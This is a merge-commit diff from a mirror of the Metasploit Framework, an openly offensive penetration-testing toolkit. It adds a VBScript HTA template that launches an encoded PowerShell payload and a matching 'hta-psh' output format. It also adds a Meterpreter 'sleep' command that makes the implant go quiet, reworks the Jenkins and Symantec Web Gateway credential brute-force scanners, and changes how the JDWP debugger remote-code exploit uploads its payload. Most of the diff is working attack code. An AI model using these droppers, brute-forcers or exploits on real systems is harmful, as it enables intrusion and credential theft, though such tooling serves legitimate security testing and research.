infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of git://github.com/rapid7/metasploit-framework

bug/bundler_fix
Samuel Huckins 2015-05-18 13:44:01 -05:00
parent 3d905418f4 8bd41a3834
commit e2c6742c1b
32 changed files with 284 additions and 141 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Gemfile.lock
View File

@ -9,7 +9,7 @@ PATH
json
metasploit-concern (~> 1.0)
metasploit-model (~> 1.0)
metasploit-payloads (= 0.0.5)
metasploit-payloads (= 0.0.7)
msgpack
nokogiri
packetfu (= 1.1.9)
@ -123,7 +123,7 @@ GEM
activemodel (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
railties (>= 4.0.9, < 4.1.0)
metasploit-payloads (0.0.5)
metasploit-payloads (0.0.7)
metasploit_data_models (1.0.1)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)

7
data/meterpreter/ext_server_stdapi.php
View File

@ -19,6 +19,7 @@ define("TLV_TYPE_FILE_NAME", TLV_META_TYPE_STRING | 1201);
define("TLV_TYPE_FILE_PATH", TLV_META_TYPE_STRING | 1202);
define("TLV_TYPE_FILE_MODE", TLV_META_TYPE_STRING | 1203);
define("TLV_TYPE_FILE_SIZE", TLV_META_TYPE_UINT | 1204);
define("TLV_TYPE_FILE_HASH", TLV_META_TYPE_RAW | 1206);
define("TLV_TYPE_STAT_BUF", TLV_META_TYPE_COMPLEX | 1220);
@ -533,8 +534,7 @@ function stdapi_fs_md5($req, &$pkt) {
$md5 = md5(file_get_contents($path));
}
$md5 = pack("H*", $md5);
# Ghetto abuse of file name type to indicate the md5 result
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_HASH, $md5));
return ERROR_SUCCESS;
}
}
@ -552,8 +552,7 @@ function stdapi_fs_sha1($req, &$pkt) {
$sha1 = sha1(file_get_contents($path));
}
$sha1 = pack("H*", $sha1);
# Ghetto abuse of file name type to indicate the sha1 result
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_HASH, $sha1));
return ERROR_SUCCESS;
}
}

5
data/meterpreter/ext_server_stdapi.py
View File

@ -307,6 +307,7 @@ TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
TLV_TYPE_FILE_HASH = TLV_META_TYPE_RAW | 1206
TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
@ -1011,7 +1012,7 @@ def stdapi_fs_md5(request, response):
m = md5.new()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
response += tlv_pack(TLV_TYPE_FILE_HASH, m.digest())
return ERROR_SUCCESS, response
@meterpreter.register_function
@ -1061,7 +1062,7 @@ def stdapi_fs_sha1(request, response):
m = sha.new()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
response += tlv_pack(TLV_TYPE_FILE_HASH, m.digest())
return ERROR_SUCCESS, response
@meterpreter.register_function

7
data/templates/scripts/to_powershell.hta.template Normal file
View File

@ -0,0 +1,7 @@
<script language="VBScript">
Set %{var_shell} = CreateObject("Wscript.Shell")
Set %{var_fso} = CreateObject("Scripting.FileSystemObject")
If %{var_fso}.FileExists(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%") + "..\powershell.exe") Then
%{var_shell}.Run "%{powershell}"
End If
</script>

12
lib/metasploit/framework/login_scanner/jenkins.rb
View File

@ -17,6 +17,10 @@ module Metasploit
self.uri = "/j_acegi_security_check" if self.uri.nil?
self.method = "POST" if self.method.nil?
if self.uri[0] != '/'
self.uri = "/#{self.uri}"
end
super
end
@ -37,15 +41,15 @@ module Metasploit
configure_http_client(cli)
cli.connect
req = cli.request_cgi({
'method'=>'POST',
'uri'=>'/j_acegi_security_check',
'method'=> method,
'uri'=> uri,
'vars_post'=> {
'j_username' => credential.public,
'j_password'=>credential.private
'j_password'=> credential.private
}
})
res = cli.send_recv(req)
if res && !res.headers['location'].include?('loginError')
if res && res.headers['location'] && !res.headers['location'].include?('loginError')
result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.headers)
else
result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: res)

2
lib/msf/core/auxiliary/report.rb
View File

@ -169,7 +169,7 @@ module Auxiliary::Report
# @option opts [String] :user The username for the cred
# @option opts [String] :pass The private part of the credential (e.g. password)
def report_auth_info(opts={})
print_error "*** #{self.fullname} is still calling the deprecated report_auth_info method! This needs to be updated!"
print_warning("*** #{self.fullname} is still calling the deprecated report_auth_info method! This needs to be updated!")
return if not db
raise ArgumentError.new("Missing required option :host") if opts[:host].nil?
raise ArgumentError.new("Missing required option :port") if (opts[:port].nil? and opts[:service].nil?)

5
lib/msf/core/exploit/mysql.rb
View File

@ -162,8 +162,9 @@ module Exploit::Remote::MYSQL
end
def mysql_drop_and_create_sys_exec(soname)
res = mysql_query("DROP FUNCTION IF EXISTS sys_exec") # Already checked, actually
return false if res.nil?
# Just drop it. MySQL will always say "OK" anyway.
# See #5244
mysql_query("DROP FUNCTION IF EXISTS sys_exec")
res = mysql_query("CREATE FUNCTION sys_exec RETURNS int SONAME '#{soname}'")
return false if res.nil?

25
lib/msf/core/payload/stager.rb
View File

@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/option_container'
require 'msf/core/payload/transport_config'
###
#
@ -9,6 +10,8 @@ require 'msf/core/option_container'
###
module Msf::Payload::Stager
include Msf::Payload::TransportConfig
def initialize(info={})
super
@ -22,6 +25,28 @@ module Msf::Payload::Stager
end
#
# Perform attempt at detecting the appropriate transport config.
# Call the determined config with passed options.
# Override this in stages/stagers to use specific transports
#
def transport_config(opts={})
if self.refname =~ /reverse_/
direction = 'reverse'
else
direction = 'bind'
end
if self.refname =~ /_tcp/
proto = 'tcp'
elsif self.refname =~ /_https/
proto = 'https'
else
proto = 'http'
end
send("transport_config_#{direction}_#{proto}", opts)
end
#
# Sets the payload type to a stager.
#

5
lib/msf/core/payload_generator.rb
View File

@ -276,12 +276,15 @@ module Msf
# @return [String] A string containing the bytes of the payload in the format selected
def generate_payload
if platform == "java" or arch == "java" or payload.start_with? "java/"
generate_java_payload
p = generate_java_payload
cli_print "Payload size: #{p.length} bytes"
p
else
raw_payload = generate_raw_payload
raw_payload = add_shellcode(raw_payload)
encoded_payload = encode_payload(raw_payload)
encoded_payload = prepend_nops(encoded_payload)
cli_print "Payload size: #{encoded_payload.length} bytes"
format_payload(encoded_payload)
end
end

26
lib/msf/util/exe.rb
View File

@ -1117,6 +1117,29 @@ require 'msf/core/exe/segment_appender'
method: 'reflection')
end
def self.to_powershell_hta(framework, arch, code)
template_path = File.join(Msf::Config.data_directory,
"templates",
"scripts")
powershell = Rex::Powershell::Command.cmd_psh_payload(code,
arch,
template_path,
encode_final_payload: true,
remove_comspec: true,
method: 'reflection')
# Intialize rig and value names
rig = Rex::RandomIdentifierGenerator.new()
rig.init_var(:var_shell)
rig.init_var(:var_fso)
hash_sub = rig.to_h
hash_sub[:powershell] = powershell
read_replace_script_template("to_powershell.hta.template", hash_sub)
end
def self.to_win32pe_vbs(framework, code, opts = {})
to_exe_vbs(to_win32pe(framework, code, opts), opts)
end
@ -1928,6 +1951,8 @@ require 'msf/core/exe/segment_appender'
Msf::Util::EXE.to_win32pe_psh_reflection(framework, code, exeopts)
when 'psh-cmd'
Msf::Util::EXE.to_powershell_command(framework, arch, code)
when 'hta-psh'
Msf::Util::EXE.to_powershell_hta(framework, arch, code)
end
end
@ -1943,6 +1968,7 @@ require 'msf/core/exe/segment_appender'
"exe-only",
"exe-service",
"exe-small",
"hta-psh",
"loop-vbs",
"macho",
"msi",

3
lib/rex/payloads/meterpreter/config.rb
View File

@ -8,7 +8,6 @@ class Rex::Payloads::Meterpreter::Config
include Msf::ReflectiveDLLLoader
UUID_SIZE = 64
URL_SIZE = 512
UA_SIZE = 256
PROXY_HOST_SIZE = 128
@ -48,7 +47,7 @@ private
end
def session_block(opts)
uuid = to_str(opts[:uuid].to_raw, UUID_SIZE)
uuid = opts[:uuid].to_raw
exit_func = Msf::Payload::Windows.exit_types[opts[:exitfunk]]
session_data = [

12
lib/rex/post/meterpreter/client_core.rb
View File

@ -340,6 +340,18 @@ class ClientCore < Extension
return true
end
def transport_sleep(seconds)
return false if seconds == 0
request = Packet.create_request('core_transport_sleep')
# we're reusing the comms timeout setting here instead of
# creating a whole new TLV value
request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, seconds)
client.send_request(request)
return true
end
def transport_next
request = Packet.create_request('core_transport_next')
client.send_request(request)

12
lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
View File

@ -152,8 +152,10 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
response = client.send_request(request)
# This is not really a file name, but a raw hash in bytes
return response.get_tlv_value(TLV_TYPE_FILE_NAME)
# older meterpreter binaries will send FILE_NAME containing the hash
hash = response.get_tlv_value(TLV_TYPE_FILE_HASH) ||
response.get_tlv_value(TLV_TYPE_FILE_NAME)
return hash
end
#
@ -166,8 +168,10 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
response = client.send_request(request)
# This is not really a file name, but a raw hash in bytes
return response.get_tlv_value(TLV_TYPE_FILE_NAME)
# older meterpreter binaries will send FILE_NAME containing the hash
hash = response.get_tlv_value(TLV_TYPE_FILE_HASH) ||
response.get_tlv_value(TLV_TYPE_FILE_NAME)
return hash
end
#

2
lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
View File

@ -94,6 +94,8 @@ class Config
'OS' => response.get_tlv_value(TLV_TYPE_OS_NAME),
'Architecture' => response.get_tlv_value(TLV_TYPE_ARCHITECTURE),
'System Language' => response.get_tlv_value(TLV_TYPE_LANG_SYSTEM),
'Domain' => response.get_tlv_value(TLV_TYPE_DOMAIN),
'Logged On Users' => response.get_tlv_value(TLV_TYPE_LOGGED_ON_USER_COUNT)
}
end

15
lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
View File

@ -30,6 +30,7 @@ TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
TLV_TYPE_FILE_SHORT_NAME = TLV_META_TYPE_STRING | 1205
TLV_TYPE_FILE_HASH = TLV_META_TYPE_RAW | 1206
TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
@ -112,12 +113,14 @@ TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
# Config
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
TLV_TYPE_LANG_SYSTEM = TLV_META_TYPE_STRING | 1044
TLV_TYPE_SID = TLV_META_TYPE_STRING | 1045
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
TLV_TYPE_LANG_SYSTEM = TLV_META_TYPE_STRING | 1044
TLV_TYPE_SID = TLV_META_TYPE_STRING | 1045
TLV_TYPE_DOMAIN = TLV_META_TYPE_STRING | 1046
TLV_TYPE_LOGGED_ON_USER_COUNT = TLV_META_TYPE_UINT | 1047
# Environment
TLV_TYPE_ENV_VARIABLE = TLV_META_TYPE_STRING | 1100

2
lib/rex/post/meterpreter/packet.rb
View File

@ -102,7 +102,7 @@ TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_STRING | 461
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501

48
lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
View File

@ -86,6 +86,10 @@ class Console::CommandDispatcher::Core
# Yet to implement transport hopping for other meterpreters.
# Works for posix and native windows though.
c["transport"] = "Change the current transport mechanism"
# sleep functionality relies on the transport features, so only
# wire that in with the transport stuff.
c["sleep"] = "Force Meterpreter to go quiet, then re-establish session."
end
if (msf_loaded?)
@ -494,6 +498,45 @@ class Console::CommandDispatcher::Core
end
#
# Display help for the sleep.
#
def cmd_sleep_help
print_line('Usage: sleep <time>')
print_line
print_line(' time: Number of seconds to wait (positive integer)')
print_line
print_line(' This command tells Meterpreter to go to sleep for the specified')
print_line(' number of seconds. Sleeping will result in the transport being')
print_line(' shut down and restarted after the designated timeout.')
end
#
# Handle the sleep command.
#
def cmd_sleep(*args)
if args.length == 0
cmd_sleep_help
return
end
seconds = args.shift.to_i
if seconds <= 0
cmd_sleep_help
return
end
print_status("Telling the target instance to sleep for #{seconds} seconds ...")
if client.core.transport_sleep(seconds)
print_good("Target instance has gone to sleep, terminating current session.")
client.shutdown_passive_dispatcher
shell.stop
else
print_error("Target instance failed to go to sleep.")
end
end
#
# Arguments for transport switching
#
@ -634,8 +677,9 @@ class Console::CommandDispatcher::Core
# next draw up a table of transport entries
tbl = Rex::Ui::Text::Table.new(
'Indent' => 4,
'Columns' => columns)
'SortIndex' => -1, # disable any sorting
'Indent' => 4,
'Columns' => columns)
first = true
result[:transports].each do |t|

2
metasploit-framework.gemspec
View File

@ -64,7 +64,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model', '~> 1.0'
# Needed for Meterpreter on Windows, soon others.
spec.add_runtime_dependency 'metasploit-payloads', '0.0.5'
spec.add_runtime_dependency 'metasploit-payloads', '0.0.7'
# Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack'
# Needed by anemone crawler

4
modules/auxiliary/scanner/http/jenkins_login.rb
View File

@ -23,6 +23,8 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('LOGIN_URL', [true, 'The URL that handles the login process', '/j_acegi_security_check']),
OptEnum.new('HTTP_METHOD', [true, 'The HTTP method to use for the login', 'POST', ['GET', 'POST']]),
Opt::RPORT(8080)
], self.class)
@ -44,6 +46,8 @@ class Metasploit3 < Msf::Auxiliary
scanner = Metasploit::Framework::LoginScanner::Jenkins.new(
configure_http_login_scanner(
uri: datastore['LOGIN_URL'],
method: datastore['HTTP_METHOD'],
cred_details: cred_collection,
stop_on_success: datastore['STOP_ON_SUCCESS'],
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],

101
modules/auxiliary/scanner/http/symantec_web_gateway_login.rb
View File

@ -32,33 +32,32 @@ class Metasploit3 < Msf::Auxiliary
end
# Initializes CredentialCollection and SymantecWebGateway
def init(ip)
@cred_collection = Metasploit::Framework::CredentialCollection.new(
blank_passwords: datastore['BLANK_PASSWORDS'],
pass_file: datastore['PASS_FILE'],
password: datastore['PASSWORD'],
user_file: datastore['USER_FILE'],
userpass_file: datastore['USERPASS_FILE'],
username: datastore['USERNAME'],
user_as_pass: datastore['USER_AS_PASS']
)
@scanner = Metasploit::Framework::LoginScanner::SymantecWebGateway.new(
configure_http_login_scanner(
host: ip,
port: datastore['RPORT'],
cred_details: @cred_collection,
stop_on_success: datastore['STOP_ON_SUCCESS'],
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
connection_timeout: 5
def scanner(ip)
@scanner ||= lambda {
cred_collection = Metasploit::Framework::CredentialCollection.new(
blank_passwords: datastore['BLANK_PASSWORDS'],
pass_file: datastore['PASS_FILE'],
password: datastore['PASSWORD'],
user_file: datastore['USER_FILE'],
userpass_file: datastore['USERPASS_FILE'],
username: datastore['USERNAME'],
user_as_pass: datastore['USER_AS_PASS']
)
)
end
return Metasploit::Framework::LoginScanner::SymantecWebGateway.new(
configure_http_login_scanner(
host: ip,
port: datastore['RPORT'],
cred_details: cred_collection,
stop_on_success: datastore['STOP_ON_SUCCESS'],
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
connection_timeout: 5
))
}.call
end
# Reports a good login credential
def do_report(ip, port, result)
def report_good_cred(ip, port, result)
service_data = {
address: ip,
port: port,
@ -86,39 +85,34 @@ class Metasploit3 < Msf::Auxiliary
end
def report_bad_cred(ip, rport, result)
invalidate_login(
address: ip,
port: rport,
protocol: 'tcp',
public: result.credential.public,
private: result.credential.private,
realm_key: result.credential.realm_key,
realm_value: result.credential.realm,
status: result.status,
proof: result.proof
)
end
# Attempts to login
def bruteforce(ip)
@scanner.scan! do |result|
scanner(ip).scan! do |result|
case result.status
when Metasploit::Model::Login::Status::SUCCESSFUL
print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"
do_report(ip, rport, result)
print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'")
report_good_cred(ip, rport, result)
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
vprint_brute :level => :verror, :ip => ip, :msg => result.proof
invalidate_login(
address: ip,
port: rport,
protocol: 'tcp',
public: result.credential.public,
private: result.credential.private,
realm_key: result.credential.realm_key,
realm_value: result.credential.realm,
status: result.status,
proof: result.proof
)
vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)
report_bad_cred(ip, rport, result)
when Metasploit::Model::Login::Status::INCORRECT
vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
invalidate_login(
address: ip,
port: rport,
protocol: 'tcp',
public: result.credential.public,
private: result.credential.private,
realm_key: result.credential.realm_key,
realm_value: result.credential.realm,
status: result.status,
proof: result.proof
)
vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'")
report_bad_cred(ip, rport, result)
end
end
end
@ -126,9 +120,8 @@ class Metasploit3 < Msf::Auxiliary
# Start here
def run_host(ip)
init(ip)
unless @scanner.check_setup
print_brute :level => :error, :ip => ip, :msg => 'Target is not Symantec Web Gateway'
unless scanner(ip).check_setup
print_brute(:level => :error, :ip => ip, :msg => 'Target is not Symantec Web Gateway')
return
end

104
modules/exploits/multi/misc/java_jdwp_debugger.rb
View File

@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
SETSTATICVALUES_SIG = [3, 2]
INVOKESTATICMETHOD_SIG = [3, 3]
CREATENEWINSTANCE_SIG = [3, 4]
ARRAYNEWINSTANCE_SIG = [4, 1]
REFERENCETYPE_SIG = [9, 1]
INVOKEMETHOD_SIG = [9, 6]
STRINGVALUE_SIG = [10, 1]
@ -41,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
THREADSUSPEND_SIG = [11, 2]
THREADRESUME_SIG = [11, 3]
THREADSTATUS_SIG = [11, 4]
ARRAYSETVALUES_SIG = [13, 3]
EVENTSET_SIG = [15, 1]
EVENTCLEAR_SIG = [15, 2]
EVENTCLEARALL_SIG = [15, 3]
@ -173,13 +175,30 @@ class Metasploit3 < Msf::Exploit::Remote
# Reads packet response for JDWP protocol
def read_reply(timeout = default_timeout)
response = sock.get_once(-1, timeout)
fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response
pktlen, id, flags, errcode = response.unpack('NNCn')
response.slice!(0..10)
if errcode != 0 && flags == REPLY_PACKET_TYPE
fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{errcode}")
length = sock.get_once(4, timeout)
fail_with(Failure::TimeoutExpired, "#{peer} - Not received response length") unless length
pkt_len = length.unpack('N')[0]
if pkt_len < 4
fail_with(Failure::Unknown, "#{peer} - Received corrupted response")
end
pkt_len = pkt_len - 4
response = sock.get_once(pkt_len, timeout)
fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response
while response.length < pkt_len
partial = sock.get_once(pkt_len, timeout)
fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial
response << partial
end
fail_with(Failure::Unknown, "#{peer} - Received corrupted response") unless response.length == pkt_len
id, flags, err_code = response.unpack('NCn')
response.slice!(0..6)
if err_code != 0 && flags == REPLY_PACKET_TYPE
fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{err_code}")
end
response
end
@ -322,10 +341,6 @@ class Metasploit3 < Msf::Exploit::Remote
"#{@vars["vm_name"]} - #{@vars["vm_version"]}"
end
def is_java_eight
version.downcase =~ /1[.]8[.]/
end
# Returns reference for all threads currently running on target VM
def get_all_threads
sock.put(create_packet(ALLTHREADS_SIG))
@ -630,6 +645,36 @@ class Metasploit3 < Msf::Exploit::Remote
buf
end
# Creates a byte[]
def create_array(len)
target_class = get_class_by_name("[B")
fail_with(Failure::Unknown, "target_class is nil") if target_class.nil?
type_id = target_class["reftype_id"]
fail_with(Failure::Unknown, "type_id is nil") if type_id.nil?
data = format(@vars["referencetypeid_size"], type_id)
data << [len].pack('N')
sock.put(create_packet(ARRAYNEWINSTANCE_SIG, data))
buf = read_reply
buf
end
# Initializes the byte[] with values
def set_values(obj_id, args = [])
data = format(@vars["objectid_size"], obj_id)
data << [0].pack('N')
data << [args.length].pack('N')
args.each do |arg|
data << [arg].pack('C')
end
sock.put(create_packet(ARRAYSETVALUES_SIG, data))
read_reply
end
def temp_path
return nil unless datastore['TMP_PATH']
unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\')
@ -709,43 +754,14 @@ class Metasploit3 < Msf::Exploit::Remote
# Stores the payload on a new string created in target VM
def upload_payload(thread_id, pl_exe)
size = @vars["objectid_size"]
if is_java_eight
runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64;", "getDecoder")
buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
else
runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "<init>")
buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
end
unless buf[0] == [TAG_OBJECT].pack('C')
fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
end
decoder = unformat(size, buf[1..1+size-1])
if decoder.nil? || decoder == 0
fail_with(Failure::Unknown, "Failed to create Base64 decoder object")
end
cmd_obj_ids = create_string("#{Rex::Text.encode_base64(pl_exe)}")
if cmd_obj_ids.length == 0
fail_with(Failure::Unknown, "Failed to allocate string for payload dumping")
end
cmd_obj_id = cmd_obj_ids[0]["obj_id"]
data = [TAG_OBJECT].pack('C')
data << format(size, cmd_obj_id)
data_array = [data]
if is_java_eight
runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64$Decoder;", "decode", "(Ljava/lang/String;)[B")
else
runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B")
end
buf = invoke(decoder, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array)
unless buf[0] == [TAG_ARRAY].pack('C')
fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray")
end
buf = create_array(pl_exe.length)
fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Array") unless buf[0] == [TAG_ARRAY].pack('C')
pl = unformat(size, buf[1..1+size-1])
fail_with(Failure::Unknown, "Failed to create byte array to store payload") if pl.nil? || (pl == 0)
set_values(pl, pl_exe.bytes)
pl
end

2
modules/payloads/singles/windows/meterpreter_bind_tcp.rb
View File

@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = 883358
CachedSize = 884270
include Msf::Payload::TransportConfig
include Msf::Payload::Windows

2
modules/payloads/singles/windows/meterpreter_reverse_http.rb
View File

@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = 884402
CachedSize = 885314
include Msf::Payload::TransportConfig
include Msf::Payload::Windows

2
modules/payloads/singles/windows/meterpreter_reverse_https.rb
View File

@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = 884402
CachedSize = 885314
include Msf::Payload::TransportConfig
include Msf::Payload::Windows

2
modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
View File

@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = 883358
CachedSize = 884270
include Msf::Payload::TransportConfig
include Msf::Payload::Windows

2
modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
View File

@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
module Metasploit3
CachedSize = 883358
CachedSize = 884270
include Msf::Payload::TransportConfig
include Msf::Payload::Windows

2
modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
View File

@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = 1102498
CachedSize = 1102898
include Msf::Payload::TransportConfig
include Msf::Payload::Windows

2
modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
View File

@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = 1103542
CachedSize = 1103942
include Msf::Payload::TransportConfig
include Msf::Payload::Windows

2
modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
View File

@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = 1103542
CachedSize = 1103942
include Msf::Payload::TransportConfig
include Msf::Payload::Windows

2
modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
View File

@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = 1102498
CachedSize = 1102898
include Msf::Payload::TransportConfig
include Msf::Payload::Windows

2
modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
View File

@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = 1102498
CachedSize = 1102898
include Msf::Payload::TransportConfig
include Msf::Payload::Windows

2
spec/lib/msf/core/payload_generator_spec.rb
View File

@ -606,7 +606,7 @@ describe Msf::PayloadGenerator do
}
it 'calls generate_java_payload' do
payload_generator.should_receive(:generate_java_payload)
payload_generator.should_receive(:generate_java_payload).and_call_original
payload_generator.generate_payload
end
end